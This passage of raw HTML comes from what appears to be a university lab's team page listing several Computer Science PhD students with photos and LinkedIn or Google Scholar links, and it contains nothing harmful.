h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassani</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&amp;hl=en&amp;oi=ao\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 